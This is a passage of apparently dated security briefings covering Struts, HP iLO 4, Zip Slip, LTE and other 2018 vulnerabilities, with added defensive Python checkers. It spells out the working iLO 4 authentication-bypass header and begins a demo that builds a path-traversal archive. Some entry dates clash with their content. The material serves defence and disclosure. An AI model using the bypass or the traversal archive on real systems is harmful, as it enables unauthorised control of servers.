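            body = resp.read(512).decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        status, body = e.code, ""
    except (urllib.error.URLError, OSError):
        return None, "unreachable"
    return status, classify_git_head(status, body)


# Constructed responses as a scan might see them.
SAMPLES = [
    (200, "ref: refs/heads/master\n"),
    (200, "3f786850e387550fdab836ed7e6dc881de23001b\n"),
    (200, "<html><body>Welcome!</body></html>"),
    (403, "Forbidden"),
    (404, "Not Found"),
]

if __name__ == "__main__":
    for status, body in SAMPLES:
        print(status, classify_git_head(status, body))
```

Put this in the deployment pipeline against every staging and production hostname, and fail the build on “exposed”. A “blocked” result for /.git/HEAD alone is not proof of safety if the deny rule matches only that one path; the same check against /.git/config and /.git/index is cheap.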

Developers and other staff are under pressure to create and deploy systems quickly – that’s not going to change. However the process must provide for thorough systems review and policy guidance to catch potential for failure early. In today’s multiple-releases-per-day DevOps modality, this will likely involve automating good checks as part of the build process.

These themes ran through the breaches and vulnerabilities discovered this week. Consider mSpy, a popular spyware tool for monitoring kids and others. Let’s take a leap of faith and say it’s used for GOOD THINGS, like ensuring the kids are home after school. The hacked database required no authentication. It revealed large amounts of broad categories of data, including Apple iCloud usernames and authentication tokens, Facebook posts, emails, credit card transactions, and more. So, the information from the mSpy breach could include the information necessary to access a company network.  Our mobile devices collect more than we may realize.

The general lesson is that a website error can lead to information leaks for internal disruption and for external leaks. The plethora of choices this week were not (necessarily) related, but EVERY week there is something. Every organization must continuously examine the security architecture to mitigate single points of failure and to prevent resident info on one victimized system from providing the keys for a successful pivot to domain controllers or the organization’s key networks. Mobile devices mean internal networks have more external connections than their architects may realize. It’s important to remember gadgets, BYOD mobile devices, and apps like mSpy when considering information technology’s footprint.

Additional Resources
“400,000 Websites Vulnerable through Exposed .git Directories” (SC Magazine)

“Open git Global Scan” (Vladimir Smitka)

NotPetya analysis (Wired)

IoT Malware and SATCOM (Helpnet Security)

Schneider Electric Controller Vulnerability (Security Week)

British Airways Data Breach (CNN Money)

mSpy Mobile Spyware data breach (Krebs on Security)

InGuardians Resources and Events

The popular, actionable and insightful piece, “12 Things I Learned the Hard Way about Being a Project Manager in Infosec,” by InGuardians’ Director of Operations Suzanne Pereira, contains lessons and reminders on how to manage projects, by focusing on people, communication and advocacy. Read more:


Jay Beale, InGuardians Founder and CTO, will be speaking this weekend at ToorCon in San Diego.  His talk, “Hacking and Hardening Kubernetes” focuses on exploiting the technology’s weaknesses and then using its features to lock it down.  Track: Seminars, When: 9.14.18 at 16:00 PST. For more information:

InGuardians will be sponsoring Idaho Falls’ first BSides event this weekend.  Stop by our booth and chat with our Head of Offensive Services and Idaho local, Tyler Robinson.  For more information:

08/28/2018 Apache Struts 2 RCE Vulnerability Affects Many Web Apps, including products from Aruba Networks, Cisco Systems, and NetApp

Last week, the Apache Struts team publicly announced a severe remote code execution vulnerability in Apache Struts 2 (CVE-2018-11776). Similar to the Strutshock vulnerability used in the 2017 Equifax breach, this vulnerability allows an attacker to run programs of their choice on the server hosting a web application that uses specific configurations or functionality. The 2017 Equifax breach is considered by many to be the worst corporate breach in US history, wherein bad actors stole personal information, including social security numbers, belonging to 147 million people in the US, or roughly 58% of the US adult population. This vulnerability is present in Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16.

Applications are vulnerable when the struts.mapper.alwaysSelectFullNamespace flag is true (set explicitly or by a plugin such as the Convention plugin) and they either:

1) use results with no namespace, where the enclosing package has no namespace or a wildcard namespace, or
2) use a url tag without value and action set, again inside a package with no namespace or a wildcard namespace.
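The first of the two conditions above lives entirely in struts.xml, so it can be checked mechanically before anyone upgrades. As an added example (not code from the original briefing or from the Apache Struts project), the following Python scans a struts.xml for packages whose namespace attribute is missing or contains a wildcard and, within them, redirectAction or chain results that set no explicit namespace parameter; it also reports whether struts.mapper.alwaysSelectFullNamespace is set to true in the same file. Assumptions: those two result types are the ones that take a namespace parameter; the Convention plugin turns the flag on outside struts.xml and is not detected here; the url-tag condition lives in JSPs and is out of scope. The sample configuration is constructed.

```python
"""Flag struts.xml patterns that CVE-2018-11776 (S2-057) depends on.

Added example, not from the original briefing or the Apache Struts project.
Sample XML is constructed.
"""
import xml.etree.ElementTree as ET

# Result types that accept a "namespace" param; without it the namespace is
# taken from the request, which is what the exploit abuses.
NAMESPACE_RESULT_TYPES = {"redirectAction", "chain"}


def scan_struts_xml(xml_text):
    """Return (always_select_full_namespace, [(package, action, result), ...])."""
    root = ET.fromstring(xml_text)
    full_ns = any(
        c.get("name") == "struts.mapper.alwaysSelectFullNamespace"
        and (c.get("value") or "").strip().lower() == "true"
        for c in root.iter("constant")
    )
    findings = []
    for pkg in root.iter("package"):
        ns = pkg.get("namespace")
        if ns is not None and "*" not in ns:
            continue  # explicit, fixed namespace: not affected
        for action in pkg.findall("action"):
            for result in action.findall("result"):
                if result.get("type") not in NAMESPACE_RESULT_TYPES:
                    continue
                has_ns = any(p.get("name") == "namespace"
                             for p in result.findall("param"))
                if not has_ns:
                    findings.append((pkg.get("name"), action.get("name"),
                                     result.get("name", "success")))
    return full_ns, findings


# Constructed struts.xml: one risky package, one safe package, one wildcard
# package whose result is made safe by an explicit namespace param.
SAMPLE_STRUTS_XML = """<struts>
  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true"/>
  <package name="default" extends="struts-default">
    <action name="index">
      <result type="redirectAction">
        <param name="actionName">login</param>
      </result>
    </action>
  </package>
  <package name="secure" namespace="/secure" extends="struts-default">
    <action name="home">
      <result type="redirectAction">
        <param name="actionName">dashboard</param>
      </result>
    </action>
  </package>
  <package name="wild" namespace="/*" extends="struts-default">
    <action name="go">
      <result name="done" type="chain">
        <param name="actionName">next</param>
        <param name="namespace">/fixed</param>
      </result>
    </action>
  </package>
</struts>
"""

if __name__ == "__main__":
    flag, hits = scan_struts_xml(SAMPLE_STRUTS_XML)
    print("alwaysSelectFullNamespace=true:", flag)
    for hit in hits:
        print("risky result (package, action, result):", hit)
```

A hit is a reason to upgrade first and to add the missing namespace to the result as defense in depth; a clean scan is not a reason to skip the upgrade, since the flag can be set by a plugin and the url-tag pattern is not visible here.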

Many web applications and product web front-end interfaces are potentially vulnerable, including both vendors’ products and organizations’ internally-developed applications. As Apache Struts 2 is a “middleware” web application framework, organizations may not realize that they have web applications susceptible to this vulnerability.  Several vendors have already determined that their products are vulnerable, including Aruba Networks, whose announcement covers its ClearPass servers, Cisco Systems, which announced four vulnerable products, and NetApp, which announced 82 vulnerable products.

Vulnerable products and web applications will allow an attacker full remote control of the host. This may lead to organizational compromise, ransomware attack, or crypto-mining activity, whether on a small scale or through automated worm programs.

As this vulnerability was discovered in April, with some likelihood of independent discovery or leak before patches became available four months later in August, it is especially important to correct vulnerable applications quickly. Staff can implement the correction by upgrading the Apache Struts 2 framework to version 2.3.35 or 2.5.17. If the vulnerable application is provided by a vendor, InGuardians recommends seeking out the vendor’s advisory for corrective action.

Additional Resources
Apache Struts Security Bulletin

“Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts (CVE-2018-11776)” (Semmle Blog)

Aruba Networks ClearPass Policy Manager Security Advisory ARUBA-PSA-2018-005

Apache Struts Remote Code Execution Vulnerability Affecting Cisco Products: August 2018 (Cisco Security Advisory)

NetApp Security Advisory NTAP-20180822-0001

Public Exploits Posted

Plugin 112064 (Checks for Vulnerability)

CVE-2018-11776
08/20/2018 VIA C3 CPUs Allow Unauthenticated Code Execution

VIA C3 CPUs allow unauthenticated code execution, granting an attacker elevated privileges.  A new tool named project:rosenbridge exploits a backdoor on VIA C3 CPUs.  The C3 chips are found primarily in embedded x86 devices such as point-of-sale machines, automated teller machines (ATMs), healthcare hardware, industrial automation devices, and a limited percentage of desktops and laptops.  The backdoor is a small non-x86 core embedded alongside the main x86 processor. It provides what amounts to a debug mode for the x86 core, and enabling it should require kernel privileges.  Researchers discovered that unauthenticated access to the backdoor is occasionally enabled by default.  Thus far, neither the researchers nor VIA have named which devices shipped with the backdoor on by default.  This exposure allows any unprivileged code to modify the kernel of the operating system.

The impact level of this exposure is high: it is a local privilege escalation, from any unprivileged code to the kernel, for which there currently are no patches and few workarounds.  Exposure of healthcare devices, ATMs, and industrial automation devices should be taken very seriously.

InGuardians recommends that your organization identify your deployed hardware to determine which machines are affected by this flaw.  Once investigation is complete, enumerate the Windows Active Directory machine accounts corresponding to the affected devices. Each of these machine accounts must have a strong password.  The affected machines must be segregated from the enterprise network with strong network access control. If segregation is not possible, then permit access to the devices on a case-by-case basis, using a whitelist approach, until a patch is released or the devices reach the end of their life cycle.

Additional Resources

VIA C3 processors (VIA Manufacturer Product Page)

Project:rosenbridge (GitHub project page, Christopher Domas)

08/14/2018 Princeton researchers warn home IoT devices could cause serious issues for utilities
This week, a team of researchers from Princeton University will be presenting their research on home Internet of Things (IoT) devices at the USENIX Security conference in Baltimore, MD.  They used the grid simulation packages MATPOWER and PowerWorld to determine how many devices, each using how much power, would be required to negatively impact the power grid.  In this case, they based their model on a small Polish power grid from 2008.  They discovered that they could create a “cascading blackout” of 86% of the power grid by arbitrarily and unexpectedly increasing the power demand by only 1%. The researchers were able to cause this increase with a botnet containing as few as 42,000 compromised IoT water heaters.
This awareness has just recently come out of the research phase and there is no current indication of a botnet made up of compromised water heaters.  However, given the history of IoT botnets and their negative impacts, such as with the Mirai botnet in October of 2016, this type of research should be considered an early warning.  In the past, refrigerators, DVRs, smart TVs, and a whole host of other home IoT devices have been found to be part of malicious botnets of hundreds of thousands of devices which have caused network outages via distributed denial of service (DDoS) attacks.

Utility companies employ experts who predict the level of power requirements and configure generating capacity accordingly.  However, this type of attack on the demand side of the equation, involving large home appliances such as water heaters and air conditioners, could hit unexpectedly.

For the consumer, vigilance and isolation of home IoT devices is key.  Identify IoT devices on your networks, and put in controls and audit measures in order to prevent and detect abuse.  While there are standards in place for devices deployed by the utility companies, such as smart meters, there are currently no secure deployment standards for devices deployed by the homeowner.  InGuardians believes such a standard should be created and a working group assembled to ensure that the risk of these home IoT devices is mitigated.

Additional Resources
“A Quick History of IoT Botnets” (Radware)

“Mirai (Malware) [Botnet]” (Wikipedia)

“How Hacked Water Heaters Could Trigger Mass Blackouts” (Wired)
08/08/2018 Reddit Hack Reveals Flaws in SMS Based Two-Factor Authentication

Earlier this month, the popular community site Reddit revealed that it had suffered a successful intrusion affecting several employee accounts, cloud infrastructure, and source code; Reddit learned of the intrusion on June 19th.  Reddit revealed that the data access was read-only; the attacker was unable to modify any website content or user data.  Data accessed included a database backup from 2005 to 2007 (containing account credentials with salted and hashed passwords, and email addresses) and recent email digests (providing a link between email addresses and account names).

The manner in which the attacker was able to gain access to Reddit’s systems is more troubling than this particular compromise of data.  All of the compromised accounts reportedly had Two Factor Authentication (2FA) enabled.  In this particular case, the 2FA mechanism on these accounts was purported to have been a PIN delivered via SMS to a mobile device. While enabling 2FA is typically enough to protect such accounts, delivery of PINs via SMS can be compromised in at least two ways.  While we do not know the specific method employed by the attacker in this case, the likely attack vectors are:

  1. Creation of a rogue cellular tower signal, in order to lure the victim’s mobile devices.  Once connected to the rogue tower, the attacker could perform cellular traffic interception, acting as Man in the Middle (MiTM), ultimately allowing for the recovery of the SMS based PINs for the affected users.
  2. Social engineering the cellular provider customer support call center in order to port the victim’s phone number to a device under the control of the attacker.  This effectively delivers the SMS based PINs directly to the attacker.

While speculative, based on the level of effort required for the two scenarios it is most likely that the number porting attack was used here.  InGuardians operators have recently been made aware of similar number-porting attacks, though in those cases the goal was typically to take over cryptocurrency accounts.

With a successful compromise of a user’s 2FA delivery method, through either number porting or a rogue cellular tower, an attacker can gain unfettered access to a victim’s network, applications, and other credentials.  As the Reddit example shows, the overall outcome can be quite severe, potentially resulting in complete compromise of the organization.

While creating a rogue cellular tower is non-trivial, number porting is the more likely attack vector.  It requires only the boldness of the attacker to perform the appropriate social engineering, which makes the barrier to entry fairly low.

As a result of more high-profile attacks against SMS-based 2FA, organizations should carefully review and revise their stance on 2FA implementations.  At this time it is recommended that organizations move away from SMS-based 2FA to methods requiring hardware or software tokens, in addition to passwords.

For those organizations looking to start 2FA implementations for either their users or customers, it is recommended to avoid SMS-based delivery altogether and move directly to hardware or software token-based authentication, in addition to passwords.

While the adoption of hardware and software tokens can be more expensive, and more obtrusive for the end user, the overall gain in security is much greater.

Additional Resources
Reddit: We had a security incident. Here’s what you need to know.

Reddit hack shows even strong security measures can be bypassed

07/30/2018 Browsers Begin Marking Unencrypted Sites as “Not Secure”

The lack of HTTPS on a website has slowly become a sign that the company hosting a web application does not understand the impact of unencrypted traffic on its clients. As a result, browser vendors have adopted increasingly conspicuous approaches to alert users to the basic risks of unencrypted websites. They have long warned users that entering credentials into an unencrypted page is dangerous. Last week, Google released Chrome 68, which marks unencrypted sites as “Not Secure” in the URL bar. Mozilla added a similar (albeit manually activated) feature to Firefox in 2017 and might soon make it standard. Microsoft and Apple may follow suit.

Most criticism of unencrypted websites describes the risk of some nefarious group reading the web traffic or stealing passwords, but properly-configured HTTPS offers much more than those protections. Users of a properly configured HTTPS website can be sure of three things:

  • Authentication: The content is provided by the entity they expect, as vouched for by the site’s certificate.
  • Integrity: The content has not been modified between the server and the browser.
  • Confidentiality: The content cannot be read by third parties while in transit.

The risk posed by the first two points is not theoretical. Numerous countries route all web traffic through a single national proxy. Citizen Lab researchers at the University of Toronto found that one of these national proxies added cryptocurrency mining code to unencrypted websites. Citizens and tourists alike executed this code in their browsers.

The same report identified two other countries adding state-sponsored malware to unencrypted downloads. This places a company’s customers and traveling personnel (and ultimately the enterprise environment) at risk. Those who notice will point to the company as the culprit, suggesting that it was compromised since the malicious code appeared to come from its site.

Even some US internet service providers (ISPs) have injected content on unrelated sites, and some may still do so. ISPs Verizon, Comcast, and CMA Communications have all been previously identified as modifying traffic passing through their networks.

Ultimately, HTTPS sites will lose the green “Secure” indication as browsers come to treat it as the norm, and the current “Not Secure” text could change to something more ominous. Within hours of the release, some prominent retailers had already switched to HTTPS by default to avoid the potential trust issues. This had likely been planned for some time, since enabling HTTPS is often not trivial, but it demonstrated how seriously many companies take the change.

InGuardians recommends that all companies protect their websites and services with a properly-issued HTTPS certificate and up-to-date TLS settings, and that they make HTTPS mandatory by redirecting plain HTTP requests to HTTPS. These measures protect your clients, employees, and other users not only from a threat agent reading information but also from one modifying it in ways that may not be easily detected.

Deployment of HTTPS has become much easier and less expensive, as certificate authorities (CAs) have adopted new models to promote its use. Let’s Encrypt offers free certificates, and some certificate vendors offer wildcard certificates that can be used on an unlimited number of systems.

Additional Resources
Google Chrome 68 Release Notes (Jul 24, 2018)

BAD TRAFFIC: Sandvine’s PacketLogic Devices Used to Deploy Government Spyware in Turkey and Redirect Egyptian Users to Affiliate Ads? (Mar 9, 2018)

Verizon’s “supercookies” violated net neutrality transparency rule (Mar 7, 2016)

Comcast Wi-Fi serving self-promotional ads via JavaScript injection (Sept 8, 2014)

Comcast is still forcing pop-up ads on customers to upsell its modems (Dec 11, 2018)

How a banner ad for H&R Block appeared on—without Apple’s OK (Apr 7, 2013)

Qualys SSL Labs Server Test

Strong Ciphers for Apache, nginx, and Lighttpd

Let’s Encrypt: Free Certificates

07/25/2018 “Devil’s Ivy” Flaw Renders Millions of Internet of Things (IoT) Devices Vulnerable

An integer overflow in a library used by security cameras and many other Internet of Things (IoT) devices has been discovered and disclosed by security researchers at Senrio.  While the Senrio researchers demonstrated the exploit against one camera, an AXIS security camera, the vulnerable library, gSOAP by Genivia, is used by many IoT device manufacturers. It is present in 249 distinct Axis camera models alone.

The impact of this vulnerability is likely to grow in the coming weeks, as proof-of-concept exploits surface and additional vulnerable targets are identified.  Almost one year ago, weak default credentials in security cameras and DVRs opened the way for a botnet called Mirai to take hold.  At its peak, Mirai compromised more than 600,000 IoT devices and sent distributed denial of service (DDoS) attacks in excess of 1.1 terabits per second, slowing or stopping Internet access for nearly the entire eastern United States for part of a day.  At this time, there are at least thirteen (13) variants of Mirai active on the Internet.

While the Devil’s Ivy flaw has not yet resulted in a Mirai-style botnet, the announcement of the vulnerability gives us pause to think about the wide-ranging consequences of vulnerabilities in widely-deployed devices.  Now is the time to identify the products on your network that use the gSOAP library, and check for vulnerable devices.

At the time of this briefing, Axis Communications has not issued a patch for CVE-2017-9765.  Their main recommendation, which InGuardians echoes, is to restrict network access to and from the affected devices.

Network segmentation, along with controls and audit measures, is the first line of defense here.  This is a remote code execution flaw that requires no authentication or credentials, merely network access to the device.

Often, IoT devices are ignored by an organization’s security operations team because the devices are either externally managed or simply not managed at all.  It is imperative to identify the systems you have in place, and to spell out ownership and maintenance responsibility in an IT governance plan.

IoT security differs in some aspects from traditional IT security, as many of these devices provide little in the way of configuration and management.  InGuardians recommends adding IoT devices to your asset inventory and including them in regular maintenance and security audits.

Additional Resources
Devil’s Ivy: Flaw in Widely Used Third-party Code Impacts Millions (Senrio, July 18, 2017)

Axis Communications Security Advisory for Devil’s Ivy

Genivia advisory for Devil’s Ivy Vulnerability in gSOAP:

CVE Advisory for Devil’s Ivy:

“Devil’s Ivy” Vulnerability Could Afflict Millions of IoT Devices (Wired, July 18, 2017)

How a Dorm Room Minecraft Scam [Mirai] Brought Down the Internet (Wired, December 13, 2017)

Wikipedia Article on Mirai

07/16/2018 HP iLO 4: Simple Authentication bypass can lead to system compromise.

In August of 2017 Hewlett Packard Enterprise (HPE) quietly patched an authentication bypass vulnerability in version 4 of its proprietary Integrated Lights-Out (iLO) remote management controller.  iLO runs on a dedicated baseboard management controller in HP servers, enabling remote management even when the host operating system itself is not functioning.  The vulnerability, present in iLO 4 firmware versions prior to 2.53, is particularly concerning because of the criticality of the systems that many organizations manage with iLO 4, which include some of the most important systems in the organization, such as Windows Active Directory domain controllers.

This authentication bypass is over a year old and received a CVSS score of 9.8 (out of 10) upon release.  However, it appears that many organizations have NOT patched their systems.  The researchers who discovered the flaw have recently begun speaking about it publicly.  During these presentations it was disclosed that the bypass requires nothing more than sending the iLO 4 web interface an HTTP request containing a crafted header: the text “Connection: ” followed by 29 “A” characters.  This simple attack grants full access to the iLO 4 subsystem, allowing total control of the host system.  This includes the ability to access the system console as the currently logged-in user, to mount virtual media (such as a bootable penetration testing Linux distribution), and to reboot the host.

InGuardians operators have recently leveraged this HP iLO 4 authentication bypass, using exactly the scenario described above, to gain full control of Active Directory in environments where certain conditions were met.  The bypass is simple to exploit with tools such as curl under Linux, and several other proof-of-concept code releases, as well as a Metasploit module, are available.

HP iLO 3 and iLO 5 are not affected, nor are iLO 4 versions 2.53 and later.

The impact of this vulnerability will differ based on overall adoption, use cases, and policies concerning remote system management, especially those governing the use of iLO 4.  Where a vulnerable version is in use, it is possible for an attacker to gain full control of an organization’s computing infrastructure, depending on which services are hosted on iLO 4-managed systems.  Where only lower-privilege systems are managed with affected versions of iLO 4, the flaw may merely provide an initial foothold for an attacker, but one likely to lead to full compromise.

While remote management of systems is critical to effective IT operations, several things should be considered during its use to help protect the overall security of the environment:

PATCH: Add remote management solutions to the critical “short-list” of systems monitored for, and receiving, patches.
Evaluate the number of staff who actually need to conduct remote management, and limit which systems can reach the remote management interfaces through robust network segmentation and firewalling, potentially including the use of well-secured jump hosts.
Limit which systems the remote management interface itself can reach, especially for mounting remote filesystems (virtual media).  Permit remote media only from trusted sources, again restricted by robust network segmentation and firewalling.
Establish a policy for remote access login sessions, specifically remote terminal and console sessions.  Where privileged accounts can be left “logged in” indefinitely to a remote session, an attacker who reaches that same session gains all of the rights of the logged-in user.  Set short inactivity timeouts that automatically log out remote sessions.
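As an added example (not from the briefing or from HPE), the following script performs the inventory step behind the PATCH recommendation above: it reads each controller’s firmware version and flags iLO 4 units still below the 2.53 fix. It assumes that iLO answers an unauthenticated request to /xmldata?item=all with an XML summary whose <MP><PN> and <FWRI> elements hold the product name and firmware revision; the sample documents in the script are constructed to that shape. Run it with a list of iLO hostnames reachable from the management VLAN, or with no arguments to exercise the samples.

```python
"""Fleet check for HPE iLO 4 firmware versions (added example, not from the briefing or HPE).

Assumption, not stated on the page: iLO answers an unauthenticated request for
https://<ilo>/xmldata?item=all with an XML summary whose <MP><PN> and <FWRI>
elements carry the product name and firmware revision. The sample documents
below are constructed to that shape. The fixed version (2.53) is the one the
briefing and the HPE advisory give.
"""
import ssl
import urllib.request
import xml.etree.ElementTree as ET
from typing import Tuple

FIXED_ILO4_VERSION = (2, 53)


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.50' -> (2, 50); tolerates trailing text such as '2.53 Jun 2017'."""
    head = text.strip().split()[0]
    return tuple(int(part) for part in head.split("."))


def parse_ilo_summary(xml_text: str) -> Tuple[str, str]:
    """Return (product name, firmware version) from an xmldata?item=all document."""
    root = ET.fromstring(xml_text)
    mp = root.find("MP")
    if mp is None:
        raise ValueError("no <MP> element: not an iLO summary document")
    product = mp.findtext("PN", default="")
    firmware = mp.findtext("FWRI", default="")
    if not firmware:
        raise ValueError("no <FWRI> firmware element")
    return product, firmware


def ilo4_auth_bypass_exposed(product: str, firmware: str) -> bool:
    """True for an iLO 4 running firmware older than 2.53. iLO 3 and iLO 5 are out of scope."""
    if "iLO 4" not in product and "Lights-Out 4" not in product:
        return False
    return parse_version(firmware) < FIXED_ILO4_VERSION


def triage(xml_text: str) -> str:
    """One-line verdict for a summary document."""
    product, firmware = parse_ilo_summary(xml_text)
    state = "VULNERABLE" if ilo4_auth_bypass_exposed(product, firmware) else "ok"
    return f"{product} firmware {firmware}: {state}"


def fetch_ilo_summary(host: str, timeout: float = 5.0) -> str:
    """Pull the summary over HTTPS. iLO certificates are usually self-signed, so
    verification is off; acceptable for a read-only sweep on the management
    VLAN, not for anything that sends credentials."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    url = f"https://{host}/xmldata?item=all"
    with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
        return resp.read().decode("utf-8", errors="replace")


# Constructed sample documents (shape assumed from iLO's xmldata output).
SAMPLE_VULNERABLE = (
    "<RIMP><HSI><SPN>ProLiant DL380 Gen9</SPN></HSI>"
    "<MP><ST>1</ST><PN>Integrated Lights-Out 4 (iLO 4)</PN><FWRI>2.50</FWRI>"
    "<HWRI>ASIC: 16</HWRI></MP></RIMP>"
)
SAMPLE_PATCHED = SAMPLE_VULNERABLE.replace("<FWRI>2.50</FWRI>", "<FWRI>2.55</FWRI>")
SAMPLE_ILO5 = (
    SAMPLE_VULNERABLE.replace("Lights-Out 4 (iLO 4)", "Lights-Out 5 (iLO 5)")
    .replace("<FWRI>2.50</FWRI>", "<FWRI>1.10</FWRI>")
)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 1:
        for doc in (SAMPLE_VULNERABLE, SAMPLE_PATCHED, SAMPLE_ILO5):
            print(triage(doc))
    for host in sys.argv[1:]:
        try:
            print(host, triage(fetch_ilo_summary(host)))
        except Exception as exc:  # unreachable host, not an iLO, odd XML
            print(host, "error:", exc)
```

Because the summary endpoint needs no credentials, the same sweep tells you which management interfaces are reachable from wherever you run it; any iLO that answers from outside the management segment is a segmentation finding regardless of its firmware version.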

Additional Resources
HP iLO4 vulnerability: authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53:

Subverting your server through its BMC: the HPE iLO4 case [Fabien Périgaud, Alexandre Gazet, and Joffrey Czarny]:

07/09/2018 Google confirms external apps can scan and allow their staff to read your emails.

Google continues to allow outside software developers to “scan the inboxes of millions of Gmail users who signed up for email-based services offering shopping price comparisons, automated travel-itinerary planners or other tools.” (see the WSJ report linked below)  Additionally, people who have connected third-party apps to their accounts may have unwittingly granted those developers’ human staff permission to read messages those people considered private.

Impact
All reports available to date suggest this is a common practice and not limited to Google. In June 2017, Google announced that it would stop scanning Gmail content for ad personalization. It seems that the company instead allows third-party application developers to do so, both electronically (machine reading) and via human staff. Google has made statements assuring that these developers are vetted, but remains silent about any subsequent verification of their practices.

Many organizations, as well as individuals, rely on Gmail and similar provider-managed email services. This suggests that anything discussed in such emails is potentially exposed to connected apps and to the developers of those apps. It raises significant questions about the security of email exchanges and highlights the need for organizational policy and practice to mitigate loss of intellectual property and exposure of confidential information.

While exposure of email content is not new, this is a new vector for it. Even if Google’s vetting is sound and developers adhere to reasonable security procedures, we know that data breaches at third parties are a common source of data exposure (see the EXACTIS link below). It also raises a question about possible exposure of ANY hosted service. Reporting has limited discussion to consumer Gmail and has been silent about whether G Suite accounts using a company’s own domain are in the mix.

Review written policies for all external email communication, both among employees and with clients, to ensure they prohibit discussion of sensitive information over such channels. Remind staff to remain vigilant about discussing business dealings in email.

Review written policies to confirm that employees are not permitted to send sensitive organization data via free/consumer-level Gmail or other third-party email providers.

Additional Resources
Wall Street Journal article and report: 

ArsTechnica: Scroogled no more: Gmail won’t scan e-mails for ads personalization

Business Insider article and discussion: 

Wired (UK) news article:
(article is apparently NOT on the US *.com website)

Wired article about EXACTIS breach: 

ABC (Australia) article with a good guide to checking apps: 

07/02/2018 New attacks against LTE networks
Three new attack vectors against the LTE (aka 4G) standard have been unveiled by researchers from Ruhr-Universität Bochum and New York University Abu Dhabi.  These include two passive attacks, allowing identity mapping and website fingerprinting, and one active cryptographic attack called aLTEr, which allows attackers to redirect a victim’s network connections via DNS spoofing.  The major issue with these attack vectors is that the flaw is in the standard itself, which is ubiquitous in mobile communication, and therefore affects ALL devices using LTE.

There are three main attack vectors:
Website fingerprinting – identify which sites that users in a radio cell are visiting
Identity mapping – identify individual users in the radio cell
aLTEr – abusing flaws in the standard to redirect network communications via DNS spoofing

The impact of aLTEr and its related attack vectors is large, with hundreds of millions of devices using the vulnerable standard.  The researchers worked with the GSM Association (GSMA) and the 3rd Generation Partnership Project (3GPP), along with telephone companies, to ensure that all parties responsible for addressing the problem were notified prior to the release of the paper.

The three main attacks outlined in the paper (mapping user identities in the radio cell, identifying websites a user visited, and the alteration attack via DNS manipulation) currently require special equipment and knowledge to perform, but it will not be long before these attacks show up in the wild.  The long-term impact will depend on whether the GSMA and the 3GPP fix the current standard, in addition to ensuring that it is fixed in the next generation of the standard (5G).

The impact on individuals is hard to quantify at the moment, but the potential impact on critical infrastructure is serious.  Many critical infrastructure systems rely on LTE communications; for example, the smart grid relies heavily on LTE networks to transmit data.

The main recommendation for the moment is to identify which parts of your business operations rely on LTE communications and ensure that your vendors are using strong encryption and authentication independent of the LTE layer.

Additional Resources
Website for the attack research:
https://alter-attack.net

Academic paper on the research:

Hacker news article:

06/26/2018 Attackers leverage cost of GDPR fines to extort businesses
In what appears to be an exploitation of the concept of “the lesser of two evils”, attackers in Europe have begun changing their approach to ransom-based attacks.  Two Bulgarian companies recently had their data compromised, but instead of encrypting it and demanding that the victim pay to get it back, the attackers are threatening to make the data public.  This would expose the company to the risk of fines under Europe’s General Data Protection Regulation (GDPR), which went into effect in May.  These fines can reach 4% of annual revenue.

The attackers, acutely aware of the potentially high cost of GDPR fines, typically ask for much less.  At their highest, attackers are currently asking for the equivalent of €20,000.  This type of attack may be effective because GDPR is still relatively new, and businesses are still trying to grasp the risk of fines and the level of enforcement.

Impact
A wrinkle in this scheme is that the GDPR requires companies to report a breach within 72 hours of becoming aware of it, or face steep fines for that failure as well.  As of today, a company that self-reports a breach is still potentially liable for a fine of up to 4%.  These attacks force victimized companies to weigh the profit motive against full compliance with the law.
Due to the level of potential loss, and the possibility of running afoul of European law, companies subject to the GDPR should ensure that they do more than merely meet the minimum requirements of GDPR compliance.  They should also apply defense-in-depth strategies and perform periodic penetration testing to ensure that their most sensitive data is protected in ways that are beyond reproach.  Demonstrating that this due diligence has been performed is the best way to limit a fine in the event of a reportable breach.
06/18/2018 ZipSlip: Vulnerabilities in compression archive file processing can lead to system compromise.


Researchers have demonstrated that multiple file archive extraction libraries, across multiple programming languages, allow an attacker-supplied archive to write to arbitrary paths on the filesystem.  In essence, a program using a vulnerable C#, Java, JavaScript, Ruby, or Go library, or its own hand-written extraction code, can unintentionally overwrite files on the machine with attacker-supplied content, which can grant the attacker remote code execution on the system.  The file formats known to be affected include ZIP, tar, jar, war, cpio, apk, rar and 7z.

This is due to two major factors: vulnerable libraries, and the lack of standard, centralized file archive extraction libraries, which leads developers to hand-craft their own.  The vulnerable libraries span multiple languages and include, but may not be limited to:

JavaScript NPM: Unzipper

JavaScript NPM: Admzip

Java: codehaus/plexus-archiver

Java: zeroturnaround/zt-zip

Java: zip4j

C# / .NET: DotNetZip.Semverd

C# / .NET: SharpCompress

Go: mholt/archiver

Java: commons-compress

C# / .NET: SharpZipLib

Ruby: zip-ruby

Ruby: rubyzip

Ruby: zipruby

Go: archive

The second factor is that lack of standard libraries: it leads developers to write hand-crafted extraction routines, which often do not check that extracted files stay within the intended extraction path.  These hand-crafted code “snippets” are widely shared publicly (through websites such as StackOverflow) and adopted across many projects.  Taken together, these factors mean that many closed and open source projects have written or adopted vulnerable archive extraction code.  A malicious archive containing entries with directory traversal names (such as ../../) can overwrite sensitive system files, potentially resulting in remote code execution and full system compromise.
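As an added example (not the researchers’ code, nor code from any of the libraries listed above), the script below constructs a small malicious ZIP in memory and runs it through two extractors: the kind of hand-crafted loop the paragraph describes, which lets the ../ entry land one directory above the destination, and a hardened version that validates every entry name before writing anything. Only a scratch directory under the system temp path is touched. The same checks apply to tar and the other formats listed; the ZIP container is used here because Python ships a writer for it.

```python
"""Zip Slip in miniature: a hand-rolled extractor beside a hardened one.

Added example; not code from the ZipSlip researchers or any listed library.
The archive is built in memory. vulnerable_extract is the kind of shared
snippet the briefing describes, written without a containment check so the
escape can be observed in a scratch directory under the system temp path.
"""
import io
import os
import tempfile
import zipfile
from typing import List


def build_malicious_zip() -> bytes:
    """Constructed sample: one benign file plus an entry whose name climbs out."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "harmless\n")
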